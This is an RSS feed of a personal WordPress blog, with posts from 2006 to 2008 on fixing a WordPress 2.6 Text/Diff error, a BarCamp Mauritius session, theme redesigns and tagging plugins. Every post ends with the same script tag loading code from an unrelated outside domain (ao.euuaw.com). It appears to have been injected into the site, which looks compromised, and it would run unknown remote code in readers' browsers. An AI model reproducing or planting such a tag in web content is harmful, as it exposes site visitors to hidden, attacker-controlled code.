<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Wacdesigns &#187; WordPress</title>
	<atom:link href="http://www.wacdesigns.com/tag/wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.wacdesigns.com</link>
	<description>What about Creativity ?</description>
	<lastBuildDate>Sat, 19 Jun 2010 12:58:26 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Fatal error: require_once() [function.require]: Failed opening required &#8216;Text/Diff/Renderer.php&#8217;</title>
		<link>http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/</link>
		<comments>http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/#comments</comments>
		<pubDate>Sat, 02 Aug 2008 18:24:34 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=99</guid>
		<description><![CDATA[Was just trying to view one of my post that i modified once after being published and bumbed up with a page with these error messages: Warning: ini_set() has been disabled for security reasons in /home/wacdesig/public_html/wp-includes/pluggable.php on line 1517 Warning: &#8230; <a href="http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Was just trying to view one of my post that i modified once after being published and bumbed up with a page with these error messages:</p>
<p><strong>Warning</strong>:  ini_set() has been disabled for security reasons in <strong>/home/wacdesig/public_html/wp-includes/pluggable.php</strong> on line <strong>1517</strong></p>
<p><strong>Warning</strong>:  require_once(Text/Diff/Renderer.php) [function.require-once]: failed to open stream: No such file or directory in <strong>/home/wacdesig/public_html/wp-includes/Text/Diff/Renderer/inline.php</strong> on line <strong>17</strong></p>
<p><strong>Fatal error</strong>:  require_once() [function.require]: Failed opening required &#8216;Text/Diff/Renderer.php&#8217; (include_path=&#8217;.:/usr/lib/php:/usr/local/lib/php&#8217;) in <strong>/home/wacdesig/public_html/wp-includes/Text/Diff/Renderer/inline.php</strong> on line <strong>17</strong></p>
<p>Apparently this is due to my hosting provider that have disabled the use the the PHP function ini_set(). Great !!! how do i edit post that i have edited before&#8230; fortunately i found out someone that came up with a solution <img src='http://www.wacdesigns.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .</p>
<p>Please note that this issue is only for WP 2.6 and is cause by the new Revision module that allows you to view a revision of your post before it was edited.</p>
<p>Here is the link to the solution for this problem:<a href="http://www.code-styling.de/english/wordpress-26-and-the-textdiff-fatal-errors" target="_blank">http://www.code-styling.de/english/wordpress-26-and-the-textdiff-fatal-errors</a></p>
<p>I also found another solution for those who don&#8217;t want to download the modified WP source file that is proposed in the first solution</p>
<p>Edit the <strong>wp-includes/Text/Diff.php</strong>, line 52 :<br />
[php]<br />
require_once ABSPATH . WPINC . &#8216;/Text/Diff/Engine/&#8217; . $engine . &#8216;.php&#8217;;<br />
[/php]</p>
<p>Edit the <strong>wp-includes/Text/Diff/Renderer/inline.php</strong>, line 17 :<br />
[php]<br />
require_once ABSPATH . WPINC . &#8216;/Text/Diff/Renderer.php&#8217;;<br />
[/php]<br />
[ad#co-inlinepost]<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2008/08/02/fatal-error-require_once-functionrequire-failed-opening-required-textdiffrendererphp/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>BarCamp Mauritius Session</title>
		<link>http://www.wacdesigns.com/2008/06/22/barcamp-mauritius-session/</link>
		<comments>http://www.wacdesigns.com/2008/06/22/barcamp-mauritius-session/#comments</comments>
		<pubDate>Sun, 22 Jun 2008 18:44:36 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Mauritius]]></category>
		<category><![CDATA[My Life]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[BarCamp]]></category>
		<category><![CDATA[OpenID]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[Web 2.0]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=147</guid>
		<description><![CDATA[This Saturday i attended the first BarCamp in Mauritius, which was a great initiative from the organizers(Pierre Bernard). Even though some of the persons that should be attending did not come, it was really great and everyone that attended the &#8230; <a href="http://www.wacdesigns.com/2008/06/22/barcamp-mauritius-session/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p><a title="BarCamp Mauritius" href="http://barcamp.org/BarCampMauritius" target="_blank"><img class="alignleft" style="float: left;" src="http://farm4.static.flickr.com/3204/2431608096_fe36b70a88.jpg" alt="Logo BarCamp Mauritius" width="442" height="130" /></a>This Saturday i attended the first BarCamp in Mauritius, which was a great initiative from the organizers(<a title="Pierre Bernard" href="http://barcamp.org/PierreBernard" target="_blank">Pierre Bernard</a>). Even though some of the persons that should be attending did not come, it was really great and everyone that attended the session was really satisfied by the level of discussion and presentations that took place.</p>
<p><a title="Ubuntu" href="http://www.ubuntu.com/" target="_blank"><img class="alignleft" style="float: left;" src="http://www.ubuntu.com/themes/ubuntu07/images/ubuntulogo.png" alt="Ubuntu Logo" width="202" height="55" /></a> The first presentation was on Ubuntu Linux release performed by Malcolm(<em>hobbyist bater bis</em>). He detailed several aspect of the OS as it is becoming more and more popular for it&#8217;s ease of use and growing community support. And the possibilities for anyone to have access to a free operating system that enables any user to perform basic PC operating. With slides showing Firefox 3.0 installed by default on the latest version and <a title="Open Office" href="http://www.openoffice.org/" target="_blank">Open Office</a> with is a pretty good free alternative to <a title="Microsoft Office" href="http://office.microsoft.com/en-us/default.aspx" target="_blank">Microsoft Office</a>.</p>
<p><a title="WordPress Website" href="http://wordpress.org/" target="_blank"><img class="alignleft" style="float: left;" src="http://s.wordpress.org/about/images/wordpressicon-hanttula3.jpg" alt="WordPress Logo" width="193" height="80" /></a>Then came the intervention of <a title="Vincent L'ecluse" href="http://www.vincentlecluse.com/" target="_blank">Vincent</a>(<em>bloggeur solidaire humorist)</em>, on how to install, manage and optimize a new WordPress installation. His presentation started with the installation of the WordPress zip file in a virtual directory that is used by his <a title="Apache" href="http://www.apache.org/" target="_blank">Apache </a>server on a local machine. He created a new database using <a title="phpMyAdmin" href="http://www.phpmyadmin.net/home_page/index.php" target="_blank">phpMyAdmin</a> and then finalized the installation explaining the purpose of a good prefix for your WP Tables, which is by default &#8220;WP_&#8221;. After the installing we shown how to use plugins and widgets to enhance your WP Experience and you pages presentation. There was also a small debate on SEO Optimization on WP and how to enable permalinks or clean links to be better reference by search engine. It was a good introduction to WP and how i can be use to perform day to day blogging on the web.</p>
<p><a title="OpenID" href="http://openid.net/" target="_blank"><img class="alignleft" style="float: left;" src="http://www.openid.mu/wp-content/uploads/2008/06/logo_openid_secondary.jpg" alt="Open ID Mauritius" width="289" height="120" /></a>OpenID Mauritius, this conference was performed by our Organizer <a title="Pierre Bernard" href="http://netmu.org/" target="_blank">Pierre Bernard</a>, who will be the representative of OpenID in Mauritius.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2008/06/22/barcamp-mauritius-session/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Time for change !!! new wordpress theme</title>
		<link>http://www.wacdesigns.com/2007/10/25/time-for-change-new-wordpress-theme/</link>
		<comments>http://www.wacdesigns.com/2007/10/25/time-for-change-new-wordpress-theme/#comments</comments>
		<pubDate>Thu, 25 Oct 2007 17:25:18 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[My Life]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Work]]></category>
		<category><![CDATA[Theme]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/2007/10/25/time-for-change-new-wordpress-theme/</guid>
		<description><![CDATA[It&#8217;s been while since i last wrote something on my blog, and also make some changes, these last month have been quiet busy. I first step to get back to the blogging community is to get a lighter look for &#8230; <a href="http://www.wacdesigns.com/2007/10/25/time-for-change-new-wordpress-theme/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s been while since i last wrote something on my blog, and also make some changes, these last month have been quiet busy. I first step to get back to the blogging community is to get a lighter look for my blog, and start writing some more post. <img src='http://www.wacdesigns.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  since i have been doing many interesting things lately.</p>
<p>So how does my new theme look like ? ( I still have to make some changes thought to accept some ads and so on )<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2007/10/25/time-for-change-new-wordpress-theme/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>the &#8220;dark&#8221; theme, now widget enabled&#8230;</title>
		<link>http://www.wacdesigns.com/2007/05/24/the-dark-theme-now-widget-enabled/</link>
		<comments>http://www.wacdesigns.com/2007/05/24/the-dark-theme-now-widget-enabled/#comments</comments>
		<pubDate>Thu, 24 May 2007 12:46:11 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Tech]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Theme]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/2007/05/24/the-dark-theme-now-widget-enabled/</guid>
		<description><![CDATA[Theme is now widget enabled. After an hour of widgets documenting, my theme is not widget enabled&#8230; Now it&#8217;s time to create some widgets&#8230; I have a 2 sidebar widget content. Isn&#8217;t this cool !!! Update there was a bug &#8230; <a href="http://www.wacdesigns.com/2007/05/24/the-dark-theme-now-widget-enabled/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Theme is now widget enabled.</p>
<p>After an hour of widgets documenting, my theme is not widget enabled&#8230;</p>
<p>Now it&#8217;s time to create some widgets&#8230; I have a 2 sidebar widget content. Isn&#8217;t this cool !!!</p>
<blockquote><p><strong>Update</strong></p>
<p>there was a bug in the funtion.php file&#8230; :S when i created a new</p>
<p>&lt;?php</p>
<p>&#8211;not to forget the conditional tags</p>
<p>if(!is_admin()) //If you forget this the admin panel, might start given up on you<br />
{</p>
<p>&lt;!&#8211;<br />
<em>Some funny statements that send out the header&#8230;. </em><br />
&#8211;&gt;</p>
<p>}<br />
?&gt;</p>
<p>But it&#8217;s fixed now, maybe i&#8217;ll find out some other bugs latter on.</p></blockquote>
<p><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2007/05/24/the-dark-theme-now-widget-enabled/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Theme change&#8230; Look out  !!!</title>
		<link>http://www.wacdesigns.com/2007/05/23/theme-change-look-out/</link>
		<comments>http://www.wacdesigns.com/2007/05/23/theme-change-look-out/#comments</comments>
		<pubDate>Wed, 23 May 2007 13:42:58 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Web]]></category>
		<category><![CDATA[Theme]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/2007/05/23/theme-change-look-out/</guid>
		<description><![CDATA[Changing my fresh pursuit theme to a Bartelme Design theme. After a long run, i have decided to change my current theme to a more popular one. I thought about creating my own themes, but unfortunately i am left with &#8230; <a href="http://www.wacdesigns.com/2007/05/23/theme-change-look-out/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Changing my <a title="Fresh Pursuits - Canvas" href="http://freshpursuits.com/" target="_blank">fresh pursuit</a> theme to a  <a title="Designed by Wolfgang Bartelme" href="http://www.bartelme.at/" target="_blank">Bartelme Design</a> theme.</p>
<p>After a long run, i have decided to change my current theme to a more popular one. I thought about creating my own themes, but unfortunately i am left with only half completed designs in photoshop <img src='http://www.wacdesigns.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> . Thus i will be using this theme for a while. But i will also upload my theme proposition very soon on flickr for interested people to try to work on them.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2007/05/23/theme-change-look-out/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Wacdesigns WordPress Theme V2</title>
		<link>http://www.wacdesigns.com/2007/03/12/wacdesigns-wordpress-theme-v2/</link>
		<comments>http://www.wacdesigns.com/2007/03/12/wacdesigns-wordpress-theme-v2/#comments</comments>
		<pubDate>Mon, 12 Mar 2007 08:35:05 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Theme]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=54</guid>
		<description><![CDATA[I am back with a completely new theme idea, from the first version i realized that it was a bit too dark and way too compact&#8230; things were not obvious. So i re-designed it completely using lots of whitespaces&#8230; tell &#8230; <a href="http://www.wacdesigns.com/2007/03/12/wacdesigns-wordpress-theme-v2/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>I am back with a completely new theme idea, from the first version i realized that it was a bit too dark and way too compact&#8230; things were not obvious. So i re-designed it completely using lots of whitespaces&#8230; tell me what u think about it.<a class="imagelink" title="layout_v02.jpg" href="http://www.wacdesigns.com/wp-content/uploads/2007/03/layout_v02.jpg"><img id="image60" src="http://www.wacdesigns.com/wp-content/uploads/2007/03/layout_v02.thumbnail.jpg" alt="layout_v02.jpg" /></a><script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2007/03/12/wacdesigns-wordpress-theme-v2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress.com and Microsoft.com release new website designs</title>
		<link>http://www.wacdesigns.com/2006/12/17/wordpresscom-and-microsoftcom-release-new-website-designs/</link>
		<comments>http://www.wacdesigns.com/2006/12/17/wordpresscom-and-microsoftcom-release-new-website-designs/#comments</comments>
		<pubDate>Sun, 17 Dec 2006 15:52:14 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Web]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=45</guid>
		<description><![CDATA[On the 14th of december Microsoft launched it&#8217;s new homepage designs which is much more streamline and adapted to the upcoming for Microsoft Windows Vista theme. The interface is pretty nice, having explorer like window, that pops up, with AJAX &#8230; <a href="http://www.wacdesigns.com/2006/12/17/wordpresscom-and-microsoftcom-release-new-website-designs/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>On the 14th of december <a title="Microsoft Homepage" href="http://www.microsoft.com" target="_blank">Microsoft</a> launched it&#8217;s new homepage designs which is much more streamline and adapted to the upcoming for <a title="Microsoft Windows Vista" href="http://www.microsoft.com/windowsvista" target="_blank">Microsoft Windows Vista</a> theme. The interface is pretty nice, having explorer like window, that pops up, with AJAX content, and changeable views like typical explorer view, very nice and intuitive <img src='http://www.wacdesigns.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .</p>
<p>As for <a title="WordPress" href="http://wordpress.com/" target="_blank">WordPress</a>, the homepage has evolved more in the model of blogger, with Top Blogs and Post on the main page, together with Most popular tags used in the wordpress blogs&#8230;. quiet nice to find out what are the most popular subjects that are talked about in the blogs now <img src='http://www.wacdesigns.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2006/12/17/wordpresscom-and-microsoftcom-release-new-website-designs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>My first wordpress plugin</title>
		<link>http://www.wacdesigns.com/2006/10/23/my-first-wordpress-plugin/</link>
		<comments>http://www.wacdesigns.com/2006/10/23/my-first-wordpress-plugin/#comments</comments>
		<pubDate>Mon, 23 Oct 2006 07:28:19 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Javascript]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Plugin]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=27</guid>
		<description><![CDATA[Good news i have been kinda motivated this weekend after my session of water sports I have decided that i should creat a word press plugin to be able to interact with Google Maps. This saturday i have been working &#8230; <a href="http://www.wacdesigns.com/2006/10/23/my-first-wordpress-plugin/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Good news i have been kinda motivated this weekend after my session of water sports <img src='http://www.wacdesigns.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  I have decided that i should creat a word press plugin to be able to interact with Google Maps. This saturday i have been working the whole day on it&#8230; it&#8217;s not in a fully working version already but here are some of the features that i want to include in the first release of the plugin.</p>
<ul>
<li>Integration of WP rich text editor</li>
<li>Marker with editable HTML text info window for marker ( Where you will be able to say something about the location you have pointed out)</li>
</ul>
<p>Only these 2 features to start with&#8230; <img src='http://www.wacdesigns.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Coming features would be</p>
<ul>
<li>Polyline ability</li>
<li>Dragable markers</li>
<li>Easy photo include in the HTML text info window for marker</li>
</ul>
<p>I plan on releasing the first version end of this week.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2006/10/23/my-first-wordpress-plugin/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Technorati tags and wordpress</title>
		<link>http://www.wacdesigns.com/2006/10/12/technorati-tags-and-wordpress/</link>
		<comments>http://www.wacdesigns.com/2006/10/12/technorati-tags-and-wordpress/#comments</comments>
		<pubDate>Thu, 12 Oct 2006 09:31:47 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Web]]></category>
		<category><![CDATA[Technorati]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=15</guid>
		<description><![CDATA[Today i wanted a nice and cool way to add some Technorati tags to my post. I searched the web as usual and came by this really good plugin that did the job as it should be. Still there are &#8230; <a href="http://www.wacdesigns.com/2006/10/12/technorati-tags-and-wordpress/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Today i wanted a nice and cool way to add some <a href="http://en.wikipedia.org/wiki/Technorati">Technorati tags</a> to my post. I searched the web as usual and <span style="text-decoration: line-through;">came by this <a href="http://climbtothestars.org/archives/2005/01/18/technorati-tags-plugin/">really good plugin</a> that did the job as it should be.</span></p>
<p><span style="text-decoration: line-through;">Still there are some stuff that i am trying to figure out, because while using <a href="http://www.freshpursuits.com/canvas/">canvas</a> as main theme, i able to see the tags only when displaying single post but not on my main page, i&#8217;lll get some time to see what&#8217;s wrong&#8230; and update this post</span>.</p>
<p>Updated&#8230;</p>
<p><span id="more-16"></span></p>
<p>There is an <a title="Keyword Tags" href="http://www.andrewgrant.org/keyword-tags" target="_blank">even better plugin</a> that <a title="Andrew Grant" href="http://www.andrewgrant.org" target="_blank">andrew</a> pointed to me&#8230; and i am using it right now&#8230; very flexible with full control under the options&gt;keyword tag tab&#8230;</p>
<p>here is the list of features from <a title="keyword tag" href="http://www.andrewgrant.org/keyword-tags" target="_blank">andrewlive</a>:</p>
<blockquote><p>Features include;</p>
<ul>
<li>Adds Keyword/Tagging ability to WordPress.</li>
<li>Keyword/Tags can be edited via the WordPress interface, or inserted using a tool such as Ecto / Windows Live Writer that support keywords.</li>
<li>Keyword/Tags can be automatically displayed in posts or feeds without editing Theme files.</li>
<li>Static WordPress pages (e.g. âAboutâ) can be edited via Ecto / Windows Live Writer.</li>
<li>Drafts can be moved to the top of the list in Ecto / Windows Live Writer to avoid sorting problems.</li>
<li>Fixes a problem in Windows Live Writer where posts that include the <!--âmoreâ--> tag are truncated when edited.</li>
<li>Automatically create meta keyword header from tags for SEO purposes.</li>
</ul>
</blockquote>
<p>Really good job and nicely done&#8230;<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2006/10/12/technorati-tags-and-wordpress/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
